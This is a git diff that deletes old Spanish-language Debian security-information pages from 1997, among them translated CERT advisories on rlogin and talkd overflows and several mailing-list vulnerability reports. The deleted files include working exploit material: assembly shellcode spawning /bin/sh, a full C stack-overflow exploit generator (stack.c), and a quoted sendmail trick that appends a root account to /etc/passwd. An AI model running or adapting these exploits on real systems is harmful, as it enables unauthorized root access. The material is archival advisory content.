- descrito en la RFC 1282, explica c&oacute;mo &eacute;sta informaci&oacute;n se transfiere
- desde el equipo local, donde se ejecuta el cliente rlogin, al equipo
- remoto donde se ejecuta el servicio. <p>
- To do this, the rlogin program uses the current terminal definition as
- identified by the TERM environment variable. The protocol described in
- RFC 1282 explains how this terminal information is transferred from the
- local machine where the rlogin client program is running to the remote
- machine where service is sought. <p>
-
- Por desgracia, muchas implementaciones del programa rlogin adolecen de
- un defecto debido a que el valor de la variable de entorno TERM se copia
- a un b&uacute;fer interno sin las debidas precauciones. El b&uacute;fer que contiene
- el valor de TERM puede ser desbordado. En algunas implementaciones el
- b&uacute;fer es una variable local, con lo que la pila de llamadas a subrutinas
- puede ser reescrita y por tanto puede ser ejecutado c&oacute;digo cualquiera.
- &Eacute;ste c&oacute;digo se hallar&iacute;a bajo en control del usuario que corra el programa
- rlogin. <p>
-
- Encima, el programa rlogin es suid root. Rlogin precisa de &eacute;stos
- privilegios para poder inicializar un puerto en el rango preciso, como
- se describe en el man de in.rlogind (&oacute; rlogind): <p>
-
- <em>
- "El servidor comprueba el puerto origen del cliente. Si el puerto
- no se halla en el rango de 0 a 1023, el servidor aborta la conexion".
- </em> <p>
-
- En resumen, rlogin es un programa con suid root, que en muchas
- implementaciones contiene un defecto de programaci&oacute;n mediante el
- cual un b&uacute;fer interno puede ser desbordado y por tanto es posible
- ejecutar cualquier c&oacute;digo con privilegios de root.
-
-<li><b> Impacto</b> <p>
-
- Los usuarios pueden convertirse en root si tienen acceso a una cuenta
- en el sistema.
-
-<li> <b>Soluci&oacute;n</b> <p>
-
- Instalar un parche del proveedor, si existe (Secci&oacute;n A). Hasta que
- le sea posible ejercer &eacute;sta acci&oacute;n, le recomendamos que aplique la
- descrita en la Secci&oacute;n B.
-
- <ol>
- <li> Conseguir y aplicar un parche para solventar &eacute;ste problema <p>
-
- A continuaci&oacute;n se describe una lista de aquellos proveedores que han
- suministrado informaci&oacute;n sobre rlogin. Los detalles se encuentran en
- el Ap&eacute;ndice A de &eacute;sta notificaci&oacute;n; iremos actualizando el ap&eacute;ndice
- a medida que vayamos recibiendo informaci&oacute;n. Si el nombre de su
- proveedor no figura en &eacute;sta lista, en el CERT/CC no saben nada de &eacute;l.
- Por favor, contacte con el proveedor directamente. <p>
-
- Berkeley Software Design, Inc. (BSDI) <br>
- Cray Research - A Silicon Graphics Company <br>
- Cygnus Solutions (formerly Cygnus Support) <br>
- Data General Corporation <br>
- Digital Equipment Corporation <br>
- FreeBSD, Inc. <br>
- Hewlett-Packard Corporation <br>
- IBM Corporation <br>
- Linux Systems <br>
- NEC Corporation <br>
- NetBSD <br>
- NeXT Software, Inc. <br>
- The Open Group <br>
- The Santa Cruz Operation (SCO) <br>
- Sun Microsystems, Inc. <p>
-
- <li> Hasta el momento en el cual le sea posible aplicar el parche,
- le recomendamos una de las siguientes alternativas: <p>
-
- <ol>
- <li>Deshabilite rlogin. <p>
- Si sus usuarios no usan rlogin, qu&iacute;telo. Para ello, haga lo
- siguiente (como root) : <p>
-
- % chmod 0 /usr/bin/rlogin <p>
-
- Puede que el programa rlogin se encuentre en otros directorios de
- su sistema, tales como /bin, /usr/bin, /usr/ucb. <p>
-
- Nota: En algunos sistemas, rlogin se presenta de distintas maneras
- al efecto de ejecutar m&aacute;s cosas. Ejemplos son eklogin
- (autentificaci&oacute;n Kerberos adem&aacute;s de cifrado del flujo de datos)
- y klogin (s&oacute;lamente autentificaci&oacute;n Kerberos). Es necesario quitar
- ambos tambi&eacute;n. <p>
-
- <li> Sustituya rlogin por un programa "envoltorio". <p>
- Hemos escrito un prototipo de &eacute;sto y se halla disponible en:
-
- URL <a href="ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c">ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c</a> <p>
-
- The PGP signature for this file is available at
- URL <a href="ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c.asc">ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c.asc</a> <p>
-
- Para verificar que el fichero es el correcto, tr&aacute;igase los dos
- ficheros rlogin_wrapper.c y rlogin_wrapper.c.asc y compruebe la
- firma con pgp tal que: <p>
-
- % pgp rlogin_wrapper.c.asc rlogin_wrapper.c <p>
-
- <b>Notes:</b>
- <ul>
- <li> Puede ser necesario tocar el programa para que compile
- correctamente en su sistema.
-
- <li> Si, como se menciona en la secci&oacute;n anterior, tiene m&aacute;s
- programas del tipo rlogin, debe reemplazarlas por el
- envoltorio.
- </ul>
- </ol>
-</ol>
-<hr>
-
-<h3>Ap&eacute;ndice A - Informaci&oacute;n del proveedor</h3>
-
-
-A continuaci&oacute;n se detalla una lista de aquellos proveedores que han suministrado
- informaci&oacute;n para &eacute;sta notificaci&oacute;n; iremos actualizando &eacute;ste ap&eacute;ndice a medida
-que vayamos recibiendo informaci&oacute;n adicional. Si Vd. no ve aqu&iacute; el nombre de su
-proveedor, el CERT/CC no ha recibido noticias suyas. Por favor, contacte con el
-proceedor directamente.
-
-Sistemas Linux<p>
-
- S&oacute;lamente son vulnerables los sistemas Linux muy desactualizados. <p>
-
- Linux Netkit 0.08 lleva el rlogin corregido. Todos los sistemas Linux
- que utilicen NetKits m&aacute;s antig&uuml;os deben actualizarse a NetKit 0.09.
- Algunos proveedores han inclu&iacute;do parches en versiones NetKit-0.08.
- Conf&iacute;rmelo con su proveedor. <p>
-
- NetKit 0.09 se halla disponible en: <a href="ftp://ftp.uk.linux.org/pub/linux/Networking/base/NetKit-0.09.tar.gz">ftp://ftp.uk.linux.org/pub/linux/Networking/base/NetKit-0.09.tar.gz</a> <p>
-
-</blockquote>
-
-<P><SMALL>Ultima modificaci&oacute;n: 10 Ene 1998.
-Copyright &copy;1997 SPI; Vea
-<A HREF="../license.html">condiciones de la licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/screen.html b/spanish/security/info/screen.html
deleted file mode 100644
index d923bc1e135..00000000000
--- a/spanish/security/info/screen.html
+++ /dev/null
@@ -1,68 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre seguridad</H1>
-<HR>
-
-Debian considera la seguridad como algo muy serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>Fecha: Jue, 20 Feb 1997 21:23:31 -0500</b> <br>
-<b>Desde: Khelbin &lt;khelbin@connix.com&gt;</b> <p>
-
-
-Screen 3.07.02, cuando de halla con setuid root (como sucede habitualmente),
-permite desbordar memoria (buffer overflow) al menos sobre determinadas plataformas.
-No he le&iacute;do la totalidad del c&oacute;digo pero en un vistazo r&aacute;pido me percat&eacute; que
-attacher.c hace lo siguiente: <p>
-
-<pre>
- struct passwd ppp;
- char fullname[100];
-
- strcpy(fullname, ppp->pw_gecos);
-</pre>
-
-
-Pude trabajarme una vulneraci&oacute;n r&aacute;pida pero no funcion&oacute; en BSDI 1.1 ya que
-chpass/chfn no aceptan determinados caracteres. Por ello, leyendo en shellcode
-el campo de "Full Name" produjo un mensaje de error de "Car&aacute;cter ilegal en el campo Nombre Completo (Full Name), re-editar [s]?" o also parecido. <p>
-
-Cualquier S.O. &oacute; versi&oacute;n de chfn/chpass que no compruebe la existencia de 'caracteres ilegales', &oacute; la longitud de la informaci&oacute;n introducida en el campo
-(BSDI 1.1 no chequea la longitud, s&oacute;lamente caracteres ilegales) puede
-ser vulnerable (No he comprobado si da privilegios de sui root a&uacute;n, lo iba
-a hacer desbord&aacute;ndolo con la cadena de mi shellcode) .<p>
-
-Si alguien puede comprobarlo en plataformas distintas y mandarmelo, estar&iacute;a
-interesado. Lo que yo hac&iacute;a era poner mi cadena shellcode en una variable de
-entorno (con los NOPs y la direcci&oacute;n de retorno hacia los NOPs) y haciendo
-echo de dicha variable a un fichero. Entonces s&oacute;lamente falta leer en &eacute;se
-fichero la informaci&oacute;n de chpass/chfn como el nuevo gecos. <p>
-
-En realidad no me llev&oacute; mucho tiempo mirar entre el c&oacute;digo y encontrar
-un problema, as&iacute; que estoy seguro de que hay m&aacute;s.
-Screen es realmente un programa demasiado grande para ser suid root y
-la vieja advertencia de no ejecutar programas que no se necesitan,
-especialmente si son suid root, suele ser siempre cierta. <p>
-
-</blockquote>
-
-<P><SMALL>Ultima modificaci&oacute;n: 10 de Enero de 1998.
-Copyright &copy;1997, 1998 SPI; Vea
-<A HREF="../../license.html">condiciones de la licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/sendmail-dead-letter.html b/spanish/security/info/sendmail-dead-letter.html
deleted file mode 100644
index 6487cc5ecfc..00000000000
--- a/spanish/security/info/sendmail-dead-letter.html
+++ /dev/null
@@ -1,79 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre seguridad</H1>
-<HR>
-
-Debian considera la seguridad como algo muy serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-<blockquote>
-<b>Fecha: Martes, 25 Mar 1997 09:57:47 +0100</b> <br>
-<b>Desde: Claude Scarpelli &lt;claude@INFOBIOGEN.FR&gt;</b> <p>
-
-<pre>
-En un correo de fecha 24 de Marzo, bygranz@RS6000.CMP.ILSTU.EDU (Gonzo Granzeau) escribi&oacute;:
-> Jeffrey Moyer una vez pari&oacute; &eacute;sto:
-> > En Sabado, 22 Mar 1997 C0WZ1LL4@NETSPACE.ORG escribi&oacute;:
-> >
-> > > Hola mongolines
-> > > Probad &eacute;sto:
-> > > Lincar (hard link) /etc/passwd a /var/tmp/dead.letter
-> > > Telnet al port 25, mandad correo a alguna cuenta inexistente a alg&uacute;n
-> > > servidor sin conexi&oacute;n.
-> > > Mira tu mensaje pegado a /etc/passwd:
-> > > ej:
-> > > cowzilla::0:0:c0wz1ll4 0wns u:/:/bin/sh
-> de acuerdo, solo quiero apuntar algunas cosas relativas a &eacute;sta vulneraci&oacute;n ...
-
-> &eacute;sto no funcionar&aacute; en equipos gordos que se hallen particionados ya que
-> s&oacute;lamente se puede hacer un lincado "duro" en el mismo sistema de ficheros.
-> Otro tema es que cualquier equipo que tenga definido "MAILER-DAEMON" recibir&aacute;
-> cualquier correo all&iacute;.
-</pre>
-
-A veces, sendmail no puede mandar correo a MAILER-DAEMON. En tal caso,
-el mensaje se guarda en /var/tmp/dead.letter. <p>
-
-He observado que sucede en la siguiente configuraci&oacute;n:
-
-<ol>
-<li> sendmail en el mejor servidor MX se halla configurado para rechazar correos mayores de x bytes.
-
-
-<li> sendmail en un servidor MX de menor prioridad se halla configurado cono un cliente nulo (FEATURE(nullclient)), pero sin l&iacute;mite de tama&ntilde;o.
-
-<li> un correo muy grande (mayor de x bytes) llega al servidor donde sendmail se halla configurado como cliente nulo (el host MX de menor prioridad). <p>
-
-<b>Lo que entonces sucede es:</b>
-
-<li> el cliente nulo intenta pasar el correo al mejor MX, el cual lo rechaza (al ser mayor de x bytes)
-
-<li> Luego el cliente nulo trata de devolver el correo al que lo mand&oacute;. Ya que se trata de un cliente nulo, env&iacute;a el mensaje al mejor servidor MX.
-
-<li> Pero el mejor servidor MX rechaza el correo (mayor de x bytes). As&iacute; que
-el cliente nulo intenta mandar una notificaci&oacute;n a MAILER-DAEMON. Ya que &eacute;ste es
-un cliente nulo, manda &eacute;se correo al mejor servidor MX, el cual lo rechaza (mayor de x bytes).
-Este es una caso en el que sendmail escribir&aacute; a /var/tmp/dead.letter.
-
-</ol>
-Pueden existir otras maneras de que sendmail escriba en /var/tmp/dead.letter.
-</blockquote>
-
-<P><SMALL>Ultima modificaci&oacute;n: 10 de Enero de 1998.
-Copyright &copy;1997, 1998 SPI; Vea
-<A HREF="../../license.html">condiciones de la licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/shellcode.s b/spanish/security/info/shellcode.s
deleted file mode 100644
index 104b7bbe777..00000000000
--- a/spanish/security/info/shellcode.s
+++ /dev/null
@@ -1,37 +0,0 @@
-.text
-.globl shellcode
-shellcode:
-xorl %eax,%eax
-movb $0x31,%al
-int $0x80
-xchgl %eax,%ebx
-xorl %eax,%eax
-movb $0x17,%al
-int $0x80
-.byte 0x68
-popl %ecx
-popl %eax
-jmp *%ecx
-call *%esp
-xorl %eax,%eax
-cltd
-movl %ecx,%edi
-movb $'/'-1,%al
-incl %eax
-scasb %es:(%edi),%al
-jne -3
-movl %edi,(%ecx)
-movl %edx,4(%ecx)
-movl %edi,%ebx
-incl %eax
-scasb %es:(%edi),%al
-jne -3
-movb %dl,-1(%edi)
-movb $0x0B,%al
-int $0x80
-xorl %eax,%eax
-incl %eax
-xorl %ebx,%ebx
-int $0x80
-.byte '/'
-.string "/bin/sh0"
diff --git a/spanish/security/info/sperl-5.003.html b/spanish/security/info/sperl-5.003.html
deleted file mode 100644
index 29ae353e559..00000000000
--- a/spanish/security/info/sperl-5.003.html
+++ /dev/null
@@ -1,45 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre seguridad</H1>
-<HR>
-
-
-Debian considera la seguridad como algo muy serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-
-<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>Fecha: Jue, 17 Abr 1997 14:11:09 -0700</b><br>
-<b>From: Murphy &lt;jtmurphy@cray1.ecst.csuchico.edu&gt;</b><p>
-
-Vino a mi atenci&oacute;n el hecho de que hay un error de desbordamiento de buffer en
-sperl5.003 que permite a usuarios locales adquirir privilegios de root, si hacen SUID root.
-El programa de vulneracion y el error lo hizo y llev&oacute; a mi atenci&oacute;n
-<a href="mailto:tarreau@aemiaif.ibp.fr">Willy Tarreau</a>. <p>
-
-<a href="sperlexp.tgz">Junto</a> viene el fuente del programa de vulneraci&oacute;n.
-Ya que hay que hacer algunas cosas al programa ya compilado (Quitar 5 bytes del principio y del final del binario), el precompilado para Linux x86 puede encontrarse
-<a href="http://www.ecst.csuchico.edu/~jtmurphy/localusers.html">aqu&iacute;</a>. <p>
-
-PS. Tengan un buen d&iacute;a.
-</blockquote>
-
-<P><SMALL>Ultima modificaci&oacute;n: 10 de Enero de 1998.
-Copyright &copy;1997, 1998 SPI; Vea
-<A HREF="../../license.html">condiciones de la licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/sperlexp.tgz b/spanish/security/info/sperlexp.tgz
deleted file mode 100644
index 186277fc875..00000000000
--- a/spanish/security/info/sperlexp.tgz
+++ /dev/null
Binary files differ
diff --git a/spanish/security/info/stack.c b/spanish/security/info/stack.c
deleted file mode 100644
index 49eeaa78667..00000000000
--- a/spanish/security/info/stack.c
+++ /dev/null
@@ -1,97 +0,0 @@
-/* this stack overflow exploit code was written by jsn <jason@redline.ru> */
-/* provided "as is" and without any warranty. Sun Feb 9 08:12:54 MSK 1997 */
-/* usage: argv[0] their_stack_offset buffer_size target_program [params] */
-/* generated string will be appended to the last of params. */
-
-/* examples: stack -600 1303 /usr/bin/lpr "-J" */
-/* stack -640 153 /usr/bin/minicom -t vt100 -d "" */
-
-#include <stdlib.h>
-#include <unistd.h>
-#include <stdio.h>
-#include <string.h>
-#include <stdarg.h>
-
-#define NOP 0x90
-
-const char usage[] = "usage: %s stack-offset buffer-size argv0 argv1 ...\n";
-
-extern code();
-void dummy( void )
-{
- extern lbl();
-
- /* do "exec( "/bin/sh" ); exit(0)" */
-
-__asm__( "
-code: xorl %edx, %edx
- pushl %edx
- jmp lbl
-start2: movl %esp, %ecx
- popl %ebx
- movb %edx, 0x7(%ebx)
- xorl %eax, %eax
- movb $0xB, %eax
- int $0x80
- xorl %ebx, %ebx
- xorl %eax, %eax
- inc %eax
- int $0x80
-lbl: call start2
- .string \"/bin/sh\"
- ");
-}
-
-void Fatal( int rv, const char *fmt, ... )
-{
- va_list vl;
- va_start( vl, fmt );
- vfprintf( stderr, fmt, vl );
- va_end( vl );
- exit( rv );
-}
-
-int main( int ac, char **av )
-{
- int buff_addr; /* where our code is */
- int stack_offset = 0,
- buffer_size = 0, i, code_size;
- char *buffer, *p;
-
- buff_addr = (int)(&buff_addr); /* get the stack pointer */
- code_size = strlen( (char *)code ); /* get the size of piece of */
- /* code in dummy() */
- if( ac < 5 ) Fatal( -1, usage, *av );
-
- buff_addr -= strtol( av[ 1 ], NULL, 0 );
- buffer_size = strtoul( av[ 2 ], NULL, 0 );
-
- if( buffer_size < code_size + 4 )
- Fatal( -1, "buffer is too short -- %d minimum.\n", code_size + 5);
- /* "this is supported, but not implemented yet" ;) */
-
- if( (buffer = malloc( buffer_size )) == NULL )
- Fatal( -1, "malloc(): %s\n", strerror( errno ) );
-
- fprintf( stderr, "using buffer address 0x%8.8x\n", buff_addr );
-
- for( i = buffer_size - 4; i > buffer_size / 2; i -= 4 )
- *(int *)(buffer + i) = buff_addr;
- memset( buffer, NOP, buffer_size/2 );
-
- i = (buffer_size - code_size - 4)/2;
-
- memcpy( buffer + i, (char *)code, code_size );
- buffer[ buffer_size - 1 ] = '\0';
-
- p = malloc( strlen( av[ ac - 1 ] ) + code_size + 1 );
- if( !p )
- Fatal( -1, "malloc(): %s\n", strerror( errno ) );
-
- strcpy( p, av[ ac - 1 ] );
- strcat( p, buffer );
- av[ ac - 1 ] = p;
-
- execve( av[ 3 ], av + 3, NULL );
- perror( "exec():" );
-}
diff --git a/spanish/security/info/superprobe.html b/spanish/security/info/superprobe.html
deleted file mode 100644
index 9bb23863b9f..00000000000
--- a/spanish/security/info/superprobe.html
+++ /dev/null
@@ -1,87 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre seguridad</H1>
-<HR>
-
-
-Debian considera la seguridad como algo muy serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<b>Fecha: Martes, 4 Mar 1997 23:24:28 -0500</b> <br>
-<b>Desde: solar@IDEAL.RU</b> <p>
-
-Hola! <p>
-
-SuperProbe es un programa que viene con XFree86 para determinar el tipo de placa de video instalada, y se instala en muchas distribuciones Linux con el setuid root (convertirse en root mientras se ejecuta el proceso). Se ha discutido aqu&iacute; en otras ocasiones que adolec&iacute;a de desbordamientos de b&uacute;fer, pero aparentemente a&uacute;n no exist&iacute;a ninguna vulneraci&oacute;n. La raz&oacute;n de ello pudiera ser que &eacute;sta vulneraci&oacute;n se daba de forma algo poco usual.
-Esta es la raz&oacute;n por la cual me he decidido a publicar la vulneraci&oacute;n, como un ejemplo de aprovechar el desbordamiento sin tener que bregar con la direcci&oacute;n devuelta. <p>
-
-El desbordamiento que estoy explotando se halla en la funci&oacute;n TestChip: <p>
-
-
-<pre>
- static Bool TestChip(chip_p, Chipset)
- Chip_Descriptor *chip_p;
- int *Chipset;
- {
- char *p, *p1, name[64];
-
- [...]
-
- (void)strcpy(name, p);
- }
- if (StrCaseCmp(name, chip_p->name) == 0)
-
- [...]
-
- if (chip_p->f(Chipset))
- {
- return(TRUE);
- }
- return(FALSE);
- }
-
-</pre>
-
-Chip_Descriptor se define como sigue: <p>
-
-<pre>
- typedef Bool (*ProbeFunc) __STDCARGS((int *));
-
-[...]
-
- typedef struct {
- char *name; /* Chipset vendor/class name */
- ProbeFunc f; /* Probe function */
-[...]
- } Chip_Descriptor;
-</pre>
-
-
-Es posible sobreescribir la direcci&oacute;n de vuelta mediante el strcpy, pero un byte de chip_p podr&iacute;a verse inicializado a cero (ya que chip_p se halla colocado justo despu&eacute;s de la direcci&oacute;n de retorno, y la cadena es ASCIIZ). Esto podr&iacute;a hacer que el programa cascase al acceder a chip_p->name para pasarlo a StrCaseCmp, antes de utilizar la direcci&oacute;n de retorno. <p>
-
-Poe &eacute;se motivo escrib&iacute; de nuevo chip_p para que apuntase a una variable de entorno (vale, la direcci&oacute;n de retorno queda reescrita, pero no se utiliza nunca), que contiene una tabla de punteros (localizado al final del valor de la misma variable).
-Uno de ellos es usado al principio por StrCaseCmp, luego no casca, y el siguiente se utiliza como el apuntador a la funci&oacute; probe, luego el c&oacute;digo de shellcode se ejecuta al lamar a chip_p->f() (Puede ser necesario ajustar el alineamiento en mi programa de vulneraci&oacute;n, pruebe valores entre 0 y 3 si el de por defecto no funciona). <p>
-
-<a href="probe.c">probe.c</a>
-</blockquote>
-
-<P><SMALL>Ultima modificaci&oacute;n: 10 de Enero de 1998.
-Copyright &copy;1997, 1998 SPI; Vea
-<A HREF="../../license.html">condiciones de la licencia.</A></SMALL>
-<HR>
-</BODY>
-</HTML>
-
-
diff --git a/spanish/security/info/talkd.html b/spanish/security/info/talkd.html
deleted file mode 100644
index 595255d383f..00000000000
--- a/spanish/security/info/talkd.html
+++ /dev/null
@@ -1,207 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
-<!--translation 1.1.1.1-->
-<HTML>
-<HEAD>
-
-<TITLE>Debian GNU/Linux - Informaci&oacute;n sobre Seguridad</TITLE>
-<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1">
-<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
-</HEAD>
-
-<BODY BGCOLOR="#FFFFFF">
-
-<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Informaci&oacute;n sobre seguridad</H1>
-<HR>
-
-Debian considera la seguridad como algo muy serio. La mayor&iacute;a de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atenci&oacute;n son corregidos en 48 horas.
-
-<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P>
-
-<blockquote>
-<a href="ftp://info.cert.org/pub/cert_advisories/CA-97.04.talkd">CERT-Consultoria</a> <p>
-
-El Centro de Coordinaci&oacute;n del CERT ha recibido noticias acerca de la vulnerabilidad existente en el programa talkd(8) utilizado por talk(1).
-Construyendo de determinada manera datos DNS, un intruso puede ejecutar remotamento comandos con privilegios de root. <p>
-
-Un fichero de comandos de "exploit" ha sido puesto a disposici&oacute;n del p&uacute;blico en general, y hemos recibido noticias de acceso con &eacute;xito a recursos de root mediante la utilizaci&oacute;n de &eacute;ste fichero. <p>
-
-Debe tener precauci&oacute;n de otros avisos publicados por otros equipos relacionados con &eacute;ste problema. Tenga en cuenta que &eacute;stas notificaciones contienen material adicional y cubren otros aspectos de las vulnerabilidades sufridas por un conjunto m&aacute;s amplio de problemas, de los cuales &eacute;ste es s&oacute;lo una muestra. <p>
-
-El equipo del CERT/CC recomienda seguir los pasos necesarios para resolver &eacute;ste problema (Secci&oacute;n III.A) e instalar un parche del proveedor relativo a &eacute;sta particularidad (Sec III.B). Hasta que Vd. pueda instalar &eacute;ste parche, le aconsejamos encarecidamente que deshabilite el/los programas talkd en su instalaci&oacute;n. <p>
-
-
-Actualizaremos &eacute;stas notificaciones tan pronto como recibamos informaci&oacute;n adicional. Por favor, chequee con regularidad los ficheros de notificaci&oacute;n por si hubiera actualizaciones relativas a su instalaci&oacute;n.
-
-<hr>
-
-<ol>
-<li><b> Descripci&oacute;n</b> <p>
-
- El Centro de Coordinaci&oacute;n del CERT ha recibido informaci&oacute;n acerca de vulnerabilidad en el programa talkd(8) utilizado por talk(1)
- Talk es un programa de comunicaciones que copia texto desde un terminal de usuario a otro, pos&iacute;blemente remoto. Talkd es el "demonio" que notifica a un usuario que alguien desea iniciar una conversaci&oacute;n talk. <p>
-
- Como parte de una conexi&oacute;n de "talk", talkd efect&uacute;a una b&uacute;squeda DNS del nombre del servidor desde donde se inicia la conexi&oacute;n. Debido a que hay un insuficiente control de los l&iacute;mites del buffer donde se almacena &eacute;se nombre, es posible reescribir el espacio del pila interno de talkd.<p>
-Es posible forzar a talkd a ejecutar cualquier comando manipulando cuidadosamente la informaci&oacute;n del nombre del servidor. Ya que talkd se ejecuta con privilegios de root, ello permite que intrusos puedan ejecutar remotamente comandos con &eacute;sos privilegios. <p>
-
-
- Este ataque necesita que el intruso sea capaz de efectuar una conexi&oacute;n de red a un programa talkd vulnerable y que &eacute;ste suministre al equipo remoto informaci&oacute;n DNS corrompida. <p>
-
- Este tipo de ataque es uno de los componentes del problema que se describe en la notificaci&oacute;n CERT CA-96.04 "Informaci&oacute;n corrupta desde Servidores de Red,", disponible en <a href="ftp://info.cert.org/pub/cert_advisories/CA-96.04.corrupt_info_from_servers">ftp://info.cert.org/pub/cert_advisories/CA-96.04.corrupt_info_from_servers</a> <p>
-
- Aquellos sitios que utilicen BIND 4.9.4 Patch Level 1 &oacute; superior NO son vulnerables a ataques basados en servidor/desbordamiento de memoria relativa a direcci&oacute;n IP (incluyendo &eacute;ste problema espec&iacute;fico). <p>
-
-
-
- Sea consciente de que existen distintas versiones del programa talkd. Dependiendo de su sistema, el programa puede teber uno de los siguientes nombres: talkd, otalkd, ntalkd. <p>
-
- Para determinar si su instalaci&oacute;n permite sesiones de talk, compruebe /etc/inetd.conf: <p>
-
-<pre>
- # grep -i "^[a-z]*talk" /etc/inetd.conf
-</pre>
-
-<b>Nota:</b> Un fichero de comandos de "exploit" ha sido puesto a disposici&oacute;n del p&uacute;blico en general. El CERT/CC ha recibido noticias de acceso con &eacute;xito a recursos de root mediante la utilizaci&oacute;n de &eacute;ste fichero. <p>
-
-<li><b> Impacto</b> <p>
-
- Los intrusos pueden ser capaces de ejecutar diversos comandos bajo privilegios de root. No necesitan tener acceso a una cuenta del sistema para aprovechar &eacute;sta vulnerabilidad.
-
-<li><b> Soluci&oacute;n</b> <p>
-
- Existen varias opciones disponibles para atajar &eacute;ste problema. Nosotros recomendamos que todas la instalaciones se prevengan contra el problema general (Sec. A) y adem&aacute;s instalen un parche del proveedor (Sec. 8). Hasta que pueda instalar el parche, le aconsejamos encarecidamente que deshabilite el programa talkd en su instalaci&oacute;n (Sec C). <p>.
-
- Tenga en cuenta que deshabilitando el programa talkd se ver&aacute; protegido conta el ataque particular descrito en &eacute;sta notificaci&oacute;n, pero no contra los ataques en general basados en red que manipulan la informaci&oacute;n nombre_del_servidor/direcci&oacute;n_ip para aprovechar una determinada vulnerabilidad. <p>
-
- <ol>
- <li> Protecci&oacute;n ante un problema en general <p>
-
- En el caso general, el problema descrito en &eacute;sta notificaci&oacute;n es uno donde el agresor utiliza datos de servidor/direcci&oacute;n ip para aprovechar una vulerabilidad. El fichero de comandos antes mencionado usa el caso espec&iacute;fico de ataques con DNS, pero los agresors pueden usar otros m&eacute;todos de resoluci&oacute;n servidor/direcci&oacute;n ip, tales como NIS, el fichero /etc/hosts y dem&aacute;s. <p>
-
